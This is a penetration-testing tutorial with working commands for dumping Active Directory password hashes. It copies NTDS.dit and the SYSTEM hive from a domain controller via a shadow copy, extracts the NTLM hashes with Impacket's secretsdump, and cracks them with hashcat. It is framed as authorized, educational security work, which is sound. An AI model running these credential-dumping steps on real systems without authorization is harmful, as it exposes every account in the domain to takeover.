Penetration Testing of Active Directory

Foreword: the following information is intended as educational content and advisories on security topics. Please be reminded that it is against the law to perform penetration testing on private enterprise computers or networks without management directive and authorization. It is my intention to omit instructions for performing evasive techniques, as that is against the moral character of ethical hacking.

1. Grab the NTDS.dit and SYSTEM hive from a domain controller

NTDS.dit (the Active Directory database) is locked while the directory service is running, so it has to be copied out of a Volume Shadow Copy rather than read directly. The SYSTEM hive is needed as well, because it holds the boot key that encrypts the password hashes stored in NTDS.dit. Run the following from an elevated command prompt on the DC. The shadow copy number is not always 1: use the Shadow Copy Volume Name that vssadmin prints when it creates the snapshot.

vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit c:\
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\
reg save HKLM\SYSTEM C:\systemhive

Either of the last two commands is enough for the SYSTEM hive: the copy takes it from the shadow copy, reg save exports the live hive. Move both files off the DC to the analysis machine, then delete the snapshot (vssadmin delete shadows /shadow=<Shadow Copy ID>) and remove the copied files from the DC.

2. Extract the hashes offline with Impacket's secretsdump.py

git clone https://github.com/fortra/impacket.git /opt/impacket
cd /opt/impacket && pip install .
python /opt/impacket/examples/secretsdump.py -ntds ~/pentest/ntds.dit -system ~/pentest/SYSTEM LOCAL -outputfile pentest-ntlm-extract

The LOCAL target tells secretsdump to parse the two files you copied instead of connecting to a host, so no credentials (and no -hashes option, which is only for authenticating to a remote target) are needed. The NT hashes land in pentest-ntlm-extract.ntds, one account per line in pwdump format: domain\user:rid:lmhash:nthash:::

3. Crack the hashes using one of these tools:

  1. OphCrack
  2. John the Ripper
  3. HashCat
  4. Plain PowerShell

With hashcat, mode 1000 is NTLM and --username makes it accept the pwdump lines from secretsdump as they are. The first command runs a straight wordlist attack (-a 0) against ~/pentest.txt and records every crack in the potfile; the second reads that potfile back with --show and writes the user:hash:plaintext pairs to a file:

hashcat -m 1000 -w 3 -a 0 -p : --session=all --username -o ~/pentest/pentest.out --outfile-format=1,2 ~/pentest/pentest-ntlm-extract.ntds ~/pentest.txt --potfile-path ~/pentest/hashcat.pot
hashcat -m 1000 -w 3 -a 0 -p : --session=all --username --show -o ~/pentest/pentest_1.out --outfile-format=1,2 ~/pentest/pentest-ntlm-extract.ntds --potfile-path ~/pentest/hashcat.pot

Note that --show must point at the potfile hashcat actually wrote (hashcat.pot above), not at the outfile of the first run. On hashcat 5 and earlier the hash:plain layout was selected with --outfile-format=3; since hashcat 6 the option takes a list of fields, so 1,2 gives the same layout and 3 on its own would print only the hex plaintext.
